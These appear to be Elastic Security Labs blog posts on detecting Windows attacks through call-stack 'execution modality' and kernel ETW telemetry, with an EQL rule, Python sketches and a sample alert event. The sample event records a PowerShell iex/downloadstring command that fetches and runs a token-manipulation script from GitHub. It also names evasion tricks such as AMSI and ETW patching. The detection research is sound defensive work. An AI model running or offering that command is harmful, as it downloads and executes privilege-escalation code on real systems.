In the typical service creation scenario within the Windows OS, an installer calls sc.exe create. That makes an RCreateService RPC call to an endpoint in the Service Control Manager (SCM, aka services.exe), which then makes syscalls to the kernel-mode configuration manager to update the database of installed services in the registry. This database is later flushed to disk and restored from disk on boot.

This means that the source of truth for a running system is the registry (though hives are flushed to disk and can be tampered with offline).

In a threat hunting scenario, we could easily detect anomalous sc.exe command lines - but a different tool might make Service Control RPC calls directly.

If we were processing our threat data stringently, we could also detect anomalous Service Control RPC calls, but a different tool might make syscalls (in)directly or use another service, such as the Remote Registry, to update the service database indirectly.

In other words, some of these execution modalities bypass traditional telemetry such as Windows event logs.

So how do we monitor changes to the configuration manager? We can’t robustly monitor syscalls directly due to Kernel Patch Protection, but Microsoft has provided configuration manager callbacks as an alternative. This is where Elastic has focused our service creation detection efforts - as close to the operating system’s source of truth as possible.
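The following Python sketch illustrates monitoring the source of truth rather than a particular tool. It classifies registry writes by key path, regardless of whether sc.exe, an RPC client, a PowerShell script or direct syscalls produced them. The event shape and the function name are hypothetical. The sketch assumes each event carries a native key path such as \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\<name> plus a value name. ImagePath is used only as one example of a value that a new service defines.

```python
from __future__ import annotations

import re

# Assumed input: native key paths as seen below the Win32 layer, for example
# \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\<service name>
SERVICE_KEY = re.compile(
    r"^\\REGISTRY\\MACHINE\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})"
    r"\\Services\\([^\\]+)(?:\\(.*))?$",
    re.IGNORECASE,
)


def service_image_path_write(key_path: str, value_name: str) -> str | None:
    """Return the service name if this write sets a service's ImagePath value.

    Only the registry key and value are inspected, so the result does not depend
    on which tool or API layer issued the write.
    """
    match = SERVICE_KEY.match(key_path)
    if match and match.group(2) is None and value_name.lower() == "imagepath":
        return match.group(1)
    return None
```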

The trade-off for this low-level visibility, however, is a potential reduction in context. For example, due to Windows architectural decisions, security vendors do not know which RPC client is requesting the creation of a registry key in the services database. Microsoft only supports querying RPC client details from a user-mode RPC service.

Starting with Windows 10 21H1, Microsoft began including RPC client details in the service creation event log. This event, while less robust, sometimes provides additional context that might assist in determining the source of an anomalous behaviour.

Due to their history of abuse, some modalities have been extended with extra logging - one important example is PowerShell. This allows certain techniques to be detected with high precision - but only when executed within PowerShell. It is important not to conflate having detection coverage of a technique in PowerShell with coverage of that technique in general. This nuance is important when estimating MITRE ATT&CK coverage. As red teams routinely demonstrate, having 100% technique coverage - but only for PowerShell - is close to 0% real-world coverage.

Summiting the Pyramid (STP) is a related analytic scoring methodology from MITRE. It reaches a similar conclusion about the fragility of PowerShell scriptblock-based detections and assigns such rules a low robustness score.

High-level telemetry sources, such as Process Creation logging and PowerShell logging, are extremely brittle at detecting most techniques as they cover very few modalities. At best, they assist in detecting the most egregious Living off the Land (LotL) abuses.

Atkinson made the following astute observation in the example used to motivate the discussion:

An important point is that our higher-order objective in detection is behavior-based, not modality-based. Therefore, we should be interested in detecting Session Enumeration (behavior-focused), not Session Enumeration in PowerShell (modality-focused).

Sometimes that is only half of the story though. Sometimes detecting that the tool itself is out of context is more efficient than detecting the technique. Sometimes the execution modality itself is anomalous.

An alternative to detecting a known technique is to detect a misbehaving modality.

Call stacks divulge Modality

One of Elastic’s strengths is the inclusion of call stacks in the majority of our events. This level of call provenance detail greatly assists in determining whether a given activity is malicious or benign. Call stack summaries are often sufficient to divulge the execution modality - the runtimes for PowerShell, .NET, RPC, WMI, VBA, Lua, Python, and Java all leave traces in the call stack.

Some of our first call stack-based rules were for Office VBA macros (vbe7.dll) spawning child processes or dropping files, and for unbacked executable memory loading the .NET runtime. In both of these examples, the technique itself was largely benign; it was the modality of the behaviour that was predominantly anomalous.
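A crude way to surface the modality is to look for runtime modules in call_stack_summary. The mapping below is a hypothetical, non-exhaustive illustration. The vbe7.dll and CLR module names come from this post. The rpcrt4.dll (RPC runtime), jvm.dll (Java HotSpot) and python3*.dll (CPython) names are assumptions added for illustration. A module name match is only a hint about modality, not a verdict.

```python
from __future__ import annotations

from fnmatch import fnmatchcase

# Hypothetical, non-exhaustive mapping from runtime module names to modalities.
MODALITY_MODULES = {
    "vbe7.dll": "VBA",
    "clr.dll": ".NET",
    "mscorwks.dll": ".NET",
    "coreclr.dll": ".NET",
    "rpcrt4.dll": "RPC",
    "jvm.dll": "Java",
    "python3*.dll": "Python",
}


def modalities(call_stack_summary: str) -> set[str]:
    """Modalities whose runtime module appears anywhere in a call_stack_summary."""
    found: set[str] = set()
    for module in call_stack_summary.lower().split("|"):
        for pattern, modality in MODALITY_MODULES.items():
            if fnmatchcase(module, pattern):
                found.add(modality)
    return found
```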

So can we flip the typical behaviour-focused detection approach to a modality-focused one? For example, can we detect solely on the use of any dual-purpose API call originating from PowerShell?

Using call stacks, Elastic is able to differentiate between the API calls that originate from PowerShell scripts and those that come from the PowerShell or .NET runtimes.

Using Threat-Intelligence ETW as an approximation for a dual-purpose API, our rule for “Suspicious API Call from a PowerShell Script” was quite effective.

api where
event.provider == "Microsoft-Windows-Threat-Intelligence" and
process.name in~ ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and

/* PowerShell Script JIT - and incidental .NET assemblies */
process.thread.Ext.call_stack_final_user_module.name == "Unbacked" and
process.thread.Ext.call_stack_final_user_module.protection_provenance in ("clr.dll", "mscorwks.dll", "coreclr.dll") and

/* filesystem enumeration activity */
not process.Ext.api.summary like "IoCreateDevice( \\FileSystem\\*, (null) )" and

/* exclude nop operations */
not (process.Ext.api.name == "VirtualProtect" and process.Ext.api.parameters.protection == "RWX" and process.Ext.api.parameters.protection_old == "RWX") and

/* Citrix GPO Scripts */
not (process.parent.executable : "C:\\Windows\\System32\\gpscript.exe" and
  process.Ext.api.summary in ("VirtualProtect( Unbacked, 0x10, RWX, RW- )", "WriteProcessMemory( Self, Unbacked, 0x10 )", "WriteProcessMemory( Self, Data, 0x10 )")) and

/* cybersecurity tools */
not (process.Ext.api.name == "VirtualAlloc" and process.parent.executable : ("C:\\Program Files (x86)\\CyberCNSAgent\\cybercnsagent.exe", "C:\\Program Files\\Velociraptor\\Velociraptor.exe")) and

/* module listing */
not (process.Ext.api.name in ("EnumProcessModules", "GetModuleInformation", "K32GetModuleBaseNameW", "K32GetModuleFileNameExW") and
  process.parent.executable : ("*\\Lenovo\\*\\BGHelper.exe", "*\\Octopus\\*\\Calamari.exe")) and

/* WPM triggers multiple times at process creation */
not (process.Ext.api.name == "WriteProcessMemory" and
     process.Ext.api.metadata.target_address_name in ("PEB", "PEB32", "ProcessStartupInfo", "Data") and
     _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info like ("?:\\windows\\*\\kernelbase.dll!CreateProcess*", "Unknown")))
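Stripped of its exclusions, the core of this rule is a simple predicate over the event. The Python sketch below mirrors only the first four conditions: the provider, the PowerShell host process, an Unbacked final user module, and CLR protection provenance. The field() helper is hypothetical. It accepts both nested objects and flattened dotted keys such as "process.thread.Ext", because the examples in these posts use both styles.

```python
from __future__ import annotations

from typing import Any

POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
CLR_MODULES = {"clr.dll", "mscorwks.dll", "coreclr.dll"}


def field(event: dict, dotted: str) -> Any:
    """Look up an ECS-style dotted field in nested and/or flattened dicts."""
    parts = dotted.split(".")

    def walk(node: Any, i: int) -> Any:
        if i == len(parts):
            return node
        if not isinstance(node, dict):
            return None
        # Prefer the longest matching key, e.g. "process.thread.Ext" before "process".
        for j in range(len(parts), i, -1):
            key = ".".join(parts[i:j])
            if key in node:
                found = walk(node[key], j)
                if found is not None:
                    return found
        return None

    return walk(event, 0)


def from_powershell_script(event: dict) -> bool:
    """The rule's modality conditions only; its exclusions are omitted."""
    fum = "process.thread.Ext.call_stack_final_user_module"
    return (
        field(event, "event.provider") == "Microsoft-Windows-Threat-Intelligence"
        # in~ in EQL is case-insensitive, so compare lower-cased names
        and str(field(event, "process.name") or "").lower() in POWERSHELL_HOSTS
        and field(event, fum + ".name") == "Unbacked"
        and field(event, fum + ".protection_provenance") in CLR_MODULES
    )
```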

Even though we don’t need the brittle PowerShell AMSI logging for detection, we still include this detail in the event as context because it assists with triage. This modality-based approach even detects common PowerShell defence evasion tradecraft such as:

ntdll unhooking
AMSI patching
user-mode ETW patching

{
 "event": {
  "provider": "Microsoft-Windows-Threat-Intelligence",
  "created": "2025-01-29T18:27:09.4386902Z",
  "kind": "event",
  "category": "api",
  "type": "change",
  "outcome": "unknown"
 },
 "message": "Endpoint API event - VirtualProtect",
 "process": {
  "parent": {
   "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
  },
  "name": "powershell.exe",
  "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "code_signature": {
   "trusted": true,
   "subject_name": "Microsoft Windows",
   "exists": true,
   "status": "trusted"
  },
  "command_line": "\"powershell.exe\" & {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}",
  "pid": 21908,
  "Ext": {
   "api": {
    "summary": "VirtualProtect( kernel32.dll!FatalExit, 0x21, RWX, R-X )",
    "metadata": {
     "target_address_path": "c:\\windows\\system32\\kernel32.dll",
     "amsi_logs": [
      {
       "entries": [
        "& {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}",
        "{iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}",
        "function Get-WinLogonTokenSystem\n{\nfunction _10001011000101101\n{\n  [CmdletBinding()]\n  Param(\n [Parameter(Position = 0, Mandatory = $true)]\n [ValidateNotNullOrEmpty()]\n [Byte[]]\n ${_00110111011010011},\n ...",
        "{[Char] $_}",
        "{\n [CmdletBinding()]\n Param(\n   [Parameter(Position = 0, Mandatory = $true)]\n   [Byte[]]\n   ${_00110111011010011},\n   [Parameter(Position = 1, Mandatory = $true)]\n   [String]\n   ${_10100110010101100},\n ...",
        "{ $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBkAGwAbAA=')))) }"
       ],
       "type": "PowerShell"
      }
     ],
     "target_address_name": "kernel32.dll!FatalExit",
     "amsi_filenames": [
      "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1",
      "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1"
     ]
    },
    "behaviors": [
     "sensitive_api",
     "hollow_image",
     "unbacked_rwx"
    ],
    "name": "VirtualProtect",
    "parameters": {
     "address": 140727652261072,
     "size": 33,
     "protection_old": "R-X",
     "protection": "RWX"
    }
   },
   "code_signature": [
    {
     "trusted": true,
     "subject_name": "Microsoft Windows",
     "exists": true,
     "status": "trusted"
    }
   ],
   "token": {
    "integrity_level_name": "high"
   }
  },
  "thread": {
   "Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|Unbacked",
    "call_stack_contains_unbacked": true,
    "call_stack": [
     {
      "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14"
     },
     {
      "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x3b"
     },
     {
      "symbol_info": "Unbacked+0x3b5c",
      "protection_provenance": "clr.dll",
      "callsite_trailing_bytes": "41c644240c01833dab99f35f007406ff15b7b6f25f8bf0e85883755f85f60f95c00fb6c00fb6c041c644240c01488b55884989542410488d65c85b5e5f415c41",
      "protection": "RWX",
      "callsite_leading_bytes": "df765f4d63f64c897dc0488d55b8488bcee8ee6da95f4d8bcf488bcf488bd34d8bc64533db4c8b55b84c8955904c8d150c0000004c8955a841c644240c00ffd0"
     }
    ],
    "call_stack_final_user_module": {
     "code_signature": [
      {
       "trusted": true,
       "subject_name": "Microsoft Corporation",
       "exists": true,
       "status": "trusted"
      }
     ],
     "protection_provenance_path": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll",
     "name": "Unbacked",
     "protection_provenance": "clr.dll",
     "protection": "RWX",
     "hash": {
      "sha256": "707564fc98c58247d088183731c2e5a0f51923c6d9a94646b0f2158eb5704df4"
     }
    }
   },
   "id": 17260
  }
 },
 "user": {
  "id": "S-1-5-21-47396387-2833971351-1621354421-500"
 }
}
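The `call_stack_summary` field above is a condensed form of `call_stack`. As a rough illustration only, the Python sketch below derives such a summary under our own assumptions (this is not Elastic's documented algorithm): each frame is reduced to its module file name, non-image frames keep their `Unbacked` label, and adjacent duplicate modules are collapsed.

```python
import ntpath
import re


def frame_module(symbol_info: str) -> str:
    """Reduce a frame's symbol_info to a module name, e.g. 'ntdll.dll' or 'Unbacked'."""
    # Cut at the first '!' (symbol) or '+' (offset), leaving the module path.
    path = re.split(r"[!+]", symbol_info, maxsplit=1)[0]
    # ntpath handles Windows-style backslash paths on any host OS.
    return ntpath.basename(path)


def call_stack_summary(call_stack: list[dict]) -> str:
    """Join per-frame module names with '|', collapsing adjacent repeats (assumed rule)."""
    modules: list[str] = []
    for frame in call_stack:
        module = frame_module(frame["symbol_info"])
        if not modules or modules[-1] != module:
            modules.append(module)
    return "|".join(modules)


# The three frames from the event above.
stack = [
    {"symbol_info": "c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14"},
    {"symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x3b"},
    {"symbol_info": "Unbacked+0x3b5c"},
]
print(call_stack_summary(stack))  # ntdll.dll|kernelbase.dll|Unbacked
```

Collapsing repeats keeps the summary short enough to match with simple wildcards such as `"*Unbacked*"`, at the cost of hiding how many frames each module contributed.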

Robustness assessment

Using the Summiting the Pyramid (STP) analytic scoring methodology, we can compare our PowerShell modality-based detection rule with traditional PowerShell detections.

Analytic robustness level	Application (A)	Kernel mode (K)
Core to (Sub-)Technique (5) [best]		Kernel ETW-based PowerShell modality detections
Core to Part of (Sub-)Technique (4)		
Core to Pre-Existing Tool (3)		
Core to Adversary-Brought Tool (2)	AMSI and ScriptBlock-based PowerShell content detections	
Ephemeral (1) [worst]		

PowerShell Analytic Scoring using Summiting the Pyramid

As noted earlier, most PowerShell detections receive a low 2A robustness score using the STP scale. This is in stark contrast to our PowerShell misbehaving modality rule which receives the highest possible 5K score (where appropriate kernel telemetry is available from Microsoft).

One caveat is that an STP analytic score does not yet include any measure of the setup and maintenance costs of a rule. This could potentially be approximated by the size of a rule's known false positive software list, though most open rule sets do not include this information. We do, and in our rule’s case the false positives observed to date have been extremely manageable.

Can call stacks be spoofed though?

Yes - and slightly no. Our call stacks are all collected inline in the kernel, but the user-mode call stack itself resides in user-mode memory that the malware may control. This means that, if malware has achieved arbitrary execution, then it can control the stack frames that we see.

Sure, dual-purpose API calls from private memory are suspicious, but sometimes trying to hide your private memory is even more suspicious. This can take the form of:

Calls from overwritten modules.
Return addresses without a preceding call instruction.
Calls proxied via other modules.
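The second form can be checked because the bytes before each return address are captured in the event (`callsite_leading_bytes` above). A minimal Python sketch of such a check follows. It only recognises the common x64 `CALL rel32` (`E8`) and `CALL r/m64` (`FF /2`) encodings, it is a heuristic that coincidental byte patterns can fool, and it is not Elastic's implementation.

```python
from typing import Optional


def ff_call_length(code: bytes, start: int) -> Optional[int]:
    """Length of an x64 'FF /2' (CALL r/m64) instruction at `start`, else None.

    A REX prefix (e.g. 0x41) sits before the 0xFF opcode and does not change
    the length computed from the ModRM byte onwards, so it is ignored here.
    """
    if start + 1 >= len(code) or code[start] != 0xFF:
        return None
    modrm = code[start + 1]
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if reg != 2:  # /2 selects the near indirect CALL
        return None
    length = 2  # opcode + ModRM
    if mod == 3:  # call register, e.g. FF D0 = call rax
        return length
    if rm == 4:  # a SIB byte follows the ModRM byte
        if start + 2 >= len(code):
            return None
        length += 1
        if mod == 0 and (code[start + 2] & 7) == 5:  # SIB with no base: disp32
            length += 4
    elif mod == 0 and rm == 5:  # RIP-relative, e.g. FF 15 disp32
        length += 4
    if mod == 1:
        length += 1  # disp8
    elif mod == 2:
        length += 4  # disp32
    return length


def preceded_by_call(leading: bytes) -> bool:
    """Heuristic: do the bytes just before a return address end with a CALL?"""
    n = len(leading)
    if n >= 5 and leading[n - 5] == 0xE8:  # CALL rel32 is always 5 bytes
        return True
    # CALL r/m64 is 2 to 7 bytes long (ignoring prefixes).
    return any(ff_call_length(leading, n - k) == k for k in range(2, min(n, 7) + 1))


# Tail of callsite_leading_bytes from the event above: ... 41 c6 44 24 0c 00 ff d0
print(preceded_by_call(bytes.fromhex("41c644240c00ffd0")))  # True (call rax)
print(preceded_by_call(bytes.fromhex("9090909090909090")))  # False
```

A return address that fails this check was probably pushed or written by something other than a `CALL`, which is exactly the kind of artefact that stack spoofing tends to leave behind.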

Call stack control alone may not be enough. To truly bypass some of our call stack detections, an attacker must craft a call stack that blends in entirely with normal activity. In some environments, security teams can baseline normal call stacks with high accuracy, making it hard for attackers to remain undetected. Based on our in-house research, and with the assistance of red team tool developers, we are also continually improving our out-of-the-box detections.
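A minimal sketch of that kind of baseline, assuming events have already been reduced to (process name, API name, call stack summary) tuples; that field choice is our assumption. It learns the summaries seen during a known-good period and then flags anything new.

```python
from collections import defaultdict


class CallStackBaseline:
    """Remember which call stack summaries each (process, API) pair normally uses."""

    def __init__(self) -> None:
        self._seen: dict[tuple[str, str], set[str]] = defaultdict(set)

    def learn(self, process: str, api: str, summary: str) -> None:
        # Lower-case so that path and module casing differences do not matter.
        self._seen[(process.lower(), api)].add(summary.lower())

    def is_deviation(self, process: str, api: str, summary: str) -> bool:
        # .get() avoids inserting an empty set for never-seen pairs.
        known = self._seen.get((process.lower(), api), set())
        return summary.lower() not in known


baseline = CallStackBaseline()
# Hypothetical "known good" observation gathered during a learning period.
baseline.learn("powershell.exe", "VirtualProtect", "ntdll.dll|kernelbase.dll|clr.dll")
print(baseline.is_deviation("powershell.exe", "VirtualProtect", "ntdll.dll|kernelbase.dll|Unbacked"))  # True
```

The quality of such a baseline depends on how representative the learning period was, which is why it works best in well-understood environments.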

Finally, modern CPUs also provide numerous execution trace mechanisms that can be used to detect stack spoofing, such as Intel LBR, Intel BTS, Intel AET, Intel IPT, x64 CET and x64 Architectural LBR. Elastic already takes advantage of some of these hardware features. We have suggested to Microsoft that they may also wish to do so in further scenarios outside of exploit protection, and we are investigating further enhancements ourselves. Stay tuned.

Conclusion

Execution Modality is a new lens through which we can seek to understand attacker tradecraft.

Detecting specific techniques for individual modalities is not a cost-effective approach though - there are simply too many techniques and too many modalities. Instead, we should focus our technique detections as close to the operating system source of truth as possible; being careful not to lose necessary activity context, or to introduce unmanageable false positives. This is why Elastic considers Kernel ETW to be superior to user-mode ntdll hooking - it is closer to the source of truth allowing more robust detections.

For modality-based detection approaches, the value becomes apparent when we baseline all expected low-level telemetry for a given modality - and trigger on any deviations.

Historically, attackers have been able to choose modality for convenience. It is more cost effective to write tools in C# or PowerShell than in C or assembly. If we can herd modality then we’ve imposed cost.

Kernel ETW is the best ETW

Fri, 13 Sep 2024 00:00:00 GMT

Preamble

A critical feature of secure-by-design software is the generation of audit logs when privileged operations are performed. These native audit logs can include details of the internal software state, which are impractical for third-party security vendors to bolt on after the fact.

Most Windows components generate logs using Event Tracing for Windows (ETW). These events expose some of Windows's inner workings, and there are scenarios when endpoint security products benefit from subscribing to them. For security purposes, though, not all ETW providers are created equal.

The first consideration is typically the reliability of the event provider itself - in particular, where the logging happens. Is it within the client process and trivially vulnerable to ETW tampering? Or is it perhaps slightly safer over in an RPC server process? Ideally, though, the telemetry will come from the kernel. Given the user-to-kernel security boundary, this provides stronger anti-tamper guarantees than in-process telemetry. This is Microsoft’s recommended approach. Like Elastic Endpoint, Microsoft Defender for Endpoint also uses kernel ETW in preference to fragile user-mode ntdll hooks.

For example, an adversary might be able to easily avoid an in-process user-mode hook on ntdll!NtProtectVirtualMemory, but bypassing a kernel PROTECTVM ETW event is significantly harder. Or, at least, it should be.

The Security Event Log is effectively just persistent storage for the events from the Microsoft-Windows-Security-Auditing ETW provider. Surprisingly, Security Event 4688 for process creation is not a kernel event. The kernel dispatches the data to the Local Security Authority (lsass.exe) service, emitting an ETW event for the Event Log to consume. So, the data could be tampered with from within that server process. Contrast this with the ProcessStart event from the Microsoft-Windows-Kernel-Process provider, which is logged directly by the kernel and requires kernel-level privileges to interfere with.

The second consideration is then the reliability of the information being logged. You might trust the event source, but what if it is just blindly logging client-supplied data that is extrinsic to the event being logged?

In this article, we’ll focus on kernel ETW events. These are typically the most security-relevant because they are difficult to bypass and often pertain to privileged actions being performed on behalf of a client thread.

When Microsoft introduced Kernel Patch Protection, security vendors were significantly constrained in their ability to monitor the kernel. Given the limited number of kernel extension points provided by Microsoft, they were increasingly compelled to rely on asynchronous ETW events for after-the-fact visibility of kernel actions performed on behalf of malware.

Given this dependency, it is unfortunate that public documentation of Windows kernel telemetry sources is somewhat sparse.

Kernel ETW Events

There are currently four types of ETW providers that we need to consider.

Firstly, there are legacy and modern variants of “event provider”:

legacy (mof-based) event providers
modern (manifest-based) event providers

And then there are legacy and modern variants of “trace provider”:

legacy Windows software trace preprocessor (WPP) trace providers
modern TraceLogging trace providers

The “event” versus “trace” distinction is mostly semantic. Event providers are typically registered with the operating system ahead of time, and you can inspect the available telemetry metadata. These are typically used by system administrators for troubleshooting purposes and are often semi-documented. But when something goes really, really wrong there are (hidden) trace providers. These are typically used only by the original software authors for advanced troubleshooting and are undocumented.

In practice, each uses a slightly different format file to describe and register its events and this introduces minor differences in how the events are logged - and, more importantly, how the potential events can be enumerated.

Modern Kernel Event Providers

The modern kernel ETW providers aren’t strictly documented. However, registered event details can be queried from the operating system via the Trace Data Helper API. Microsoft’s PerfView tool uses these APIs to reconstruct the provider’s registration manifest, and Pavel Yosifovich’s EtwExplorer then wraps these manifests in a simple GUI. Tab-separated value files of the registered manifests from successive Windows versions are also available. A single line per event is very useful for grepping, though others have since published the raw XML manifests.

These aren’t all of the possible Windows ETW events, however. They are only the ones registered with the operating system by default. For example, the ETW events for many server roles aren’t registered until that feature is enabled.

Legacy Kernel Event Providers

The legacy kernel events are documented by Microsoft. Mostly.

Legacy providers also exist within the operating system as WMI EventTrace classes. Providers are the root classes, groups are the children, and events are the grandchildren.

To search legacy events in the same way as modern events, these classes were parsed and the original MOF (mostly) reconstructed. This MOF support was added to EtwExplorer, and tab-separated value summaries of the legacy events were published.

The fully reconstructed Windows Kernel Trace MOF is here (or in a tabular format here).

Of the 340 registered legacy events, only 116 were documented. Typically, each legacy event needs to be enabled via a specific flag, but these weren’t documented either. There was a clue in the documentation for the kernel Object Manager Trace events. It mentioned PERF_OB_HANDLE, a constant that is not defined in the headers in the latest SDK. Luckily, Geoff Chappell and the Windows 10 1511 WDK came to the rescue. This information was used to add support for PERFINFO_GROUPMASK kernel trace flags to Microsoft’s KrabsETW library. It also turned out that the Object Trace documentation was wrong. That non-public constant can only be used with an undocumented API extension. Fortunately, public Microsoft projects such as PerfView often provide examples of how to use undocumented APIs.
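For readers unfamiliar with the group mask format, here is a minimal Python sketch. It assumes the encoding used in the System Informer `ntwmi.h` header, as we understand it: a `PERFINFO_GROUPMASK` is eight 32-bit masks, and each `PERF_*` constant stores the mask index in its top three bits and the flag bits in the remaining 29. The flag value in the example is illustrative only.

```python
PERF_NUM_MASKS = 8
PERF_MASK_INDEX = 0xE0000000  # top 3 bits select one of the eight masks (assumed encoding)
PERF_MASK_GROUP = 0x1FFFFFFF  # low 29 bits hold the flag bits


def decode_perf_flag(flag: int) -> tuple[int, int]:
    """Split a PERF_* style constant into (mask index, flag bits)."""
    return (flag & PERF_MASK_INDEX) >> 29, flag & PERF_MASK_GROUP


def build_group_mask(*flags: int) -> list[int]:
    """OR each flag into the right slot of an eight-entry group mask."""
    masks = [0] * PERF_NUM_MASKS
    for flag in flags:
        index, bits = decode_perf_flag(flag)
        masks[index] |= bits
    return masks


# Illustrative value only: mask index 4, flag bit 0x40.
EXAMPLE_FLAG = 0x80000040
print(decode_perf_flag(EXAMPLE_FLAG))  # (4, 64)
print(build_group_mask(EXAMPLE_FLAG))  # [0, 0, 0, 0, 64, 0, 0, 0]
```

This indexing scheme is why such constants cannot simply be OR-ed into the classic 32-bit kernel enable flags and instead need the extended API mentioned above.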

With both manifests and MOFs published on GitHub, most kernel events can now be found with this query.

Interestingly, Microsoft often obfuscates the names of security-relevant events, so searching for events with a generic name prefix such as task_ yields some interesting results.

Sometimes the keyword hints to the event’s purpose. For example, task_014 in Microsoft-Windows-Kernel-General is enabled with the keyword KERNEL_GENERAL_SECURITY_ACCESSCHECK.

And thankfully, the parameters are almost always well-named. We might guess that task_05 in Microsoft-Windows-Kernel-Audit-API-Calls is related to OpenProcess since it logs fields named TargetProcessId and DesiredAccess.

Another useful query is to search for events with an explicit ProcessStartKey field. ETW events can be configured to include this field for the logging process, and any event that includes this information for another process is often security relevant.
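Because each summary holds one event per line, these searches are easy to reproduce offline. Below is a minimal Python sketch that assumes only that the files are tab-separated. Every column is searched, so no particular column layout is assumed. The sample rows are illustrative and are not copied from the published files.

```python
import csv
import io
from typing import Iterable, Iterator


def read_tsv(text: str) -> list[list[str]]:
    """Parse tab-separated text; QUOTE_NONE keeps quote characters literal."""
    return list(csv.reader(io.StringIO(text), delimiter="\t", quoting=csv.QUOTE_NONE))


def grep_events(rows: Iterable[list[str]], needle: str) -> Iterator[list[str]]:
    """Yield every row in which any column contains `needle`, ignoring case."""
    needle = needle.lower()
    for row in rows:
        if any(needle in column.lower() for column in row):
            yield row


# Illustrative rows only; the published files have their own column layout.
SAMPLE = (
    "Microsoft-Windows-Kernel-Audit-API-Calls\ttask_05\tTargetProcessId,DesiredAccess\n"
    "Example-Provider\tExampleEvent\tProcessStartKey,Flags\n"
)
rows = read_tsv(SAMPLE)
print([row[1] for row in grep_events(rows, "task_")])  # ['task_05']
print([row[0] for row in grep_events(rows, "ProcessStartKey")])  # ['Example-Provider']
```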

If you had a specific API in mind, you might query for its name or its parameters. For example, if you want Named Pipe events, you might use this query.

In this instance, though, Microsoft-Windows-SEC belongs to the built-in Microsoft Security drivers that Microsoft Defender for Endpoint (MDE) utilizes. This provider is only officially available to MDE, though Sebastian Feldmann and Philipp Schmied have demonstrated how to start a session using an AutoLogger and subscribe to that session’s events. This is currently only useful for MDE users because, otherwise, the driver is not configured to emit events.

But what about trace providers?

Modern Kernel Trace Providers

TraceLogging metadata is stored as an opaque blob within the logging binary. Thankfully this format has been reversed by Matt Graeber. We can use Matt’s script to dump all TraceLogging metadata for ntoskrnl.exe. A sample dump of Windows 11 TraceLogging metadata is here.

Unfortunately, the metadata structure alone doesn’t retain the correlation between providers and events. There are interesting provider names, such as Microsoft.Windows.Kernel.Security and AttackSurfaceMonitor, but it’s not yet clear from our metadata dump which events belong to these providers.

Legacy Kernel Trace Providers

WPP metadata is stored within symbols files (PDBs). Microsoft includes this information in the public symbols for some, but not all, drivers. The kernel itself, however, does not produce any WPP events. Instead, the legacy Windows Kernel Trace event provider can be passed undocumented flags to enable the legacy “trace” events usually only available to Microsoft kernel developers.

Provider	Documentation	Event Metadata
Modern Event Providers	None	Registered XML manifests
Legacy Event Providers	Partial	EventTrace WMI objects
Modern Trace Providers	None	Undocumented blob in binary
Legacy Trace Providers	None	Undocumented blob in Symbols

Next Steps

We now have kernel event metadata for each of the four flavours of ETW provider, but a list of ETW events is just our starting point. Knowing the provider and event keyword may not be enough to generate the events we expect. Sometimes, an additional configuration registry key or API call is required. More often, though, we just need to understand the exact conditions under which the event is logged.

Knowing exactly where and what is being logged is critical to truly understanding your telemetry and its limitations. And, thanks to decompilers becoming readily available, some just-enough reversing is now an option. In IDA we call this “press F5”. Ghidra is the open-source alternative and it supports scripting … with Java.

For kernel ETW, we are particularly interested in EtwWrite calls that are reachable from system calls. We want as much of the call site parameter information as possible, including any associated public symbol information. This meant that we needed to walk the call graph but also attempt to resolve the possible values for particular parameters.
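The reachability part of that analysis is ordinary graph search. The published script works inside Ghidra, so the Python below is only an illustration over a hypothetical call graph; every function name other than `EtwWrite` is made up. It finds a shortest call path from each system call entry point to `EtwWrite`.

```python
from collections import deque
from typing import Optional


def path_to(graph: dict[str, list[str]], start: str, target: str) -> Optional[list[str]]:
    """Breadth-first search for the shortest call path from start to target."""
    parents: dict[str, Optional[str]] = {start: None}
    queue = deque([start])
    while queue:
        func = queue.popleft()
        if func == target:
            # Walk parent links back to the start, then reverse.
            path: list[str] = []
            node: Optional[str] = func
            while node is not None:
                path.append(node)
                node = parents[node]
            return path[::-1]
        for callee in graph.get(func, []):
            if callee not in parents:  # visit each function once (handles recursion)
                parents[callee] = func
                queue.append(callee)
    return None


# Hypothetical call graph: caller -> callees.
CALL_GRAPH = {
    "NtExampleA": ["HelperCheck", "HelperLog"],
    "HelperLog": ["EtwWrite"],
    "NtExampleB": ["HelperCheck"],
    "HelperCheck": ["HelperCheck"],  # recursion is harmless
}

for syscall in ("NtExampleA", "NtExampleB"):
    print(syscall, path_to(CALL_GRAPH, syscall, "EtwWrite"))
# NtExampleA ['NtExampleA', 'HelperLog', 'EtwWrite']
# NtExampleB None
```

In a real binary, the harder part is what the script adds on top of this: resolving the parameter values at each `EtwWrite` call site along the path.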

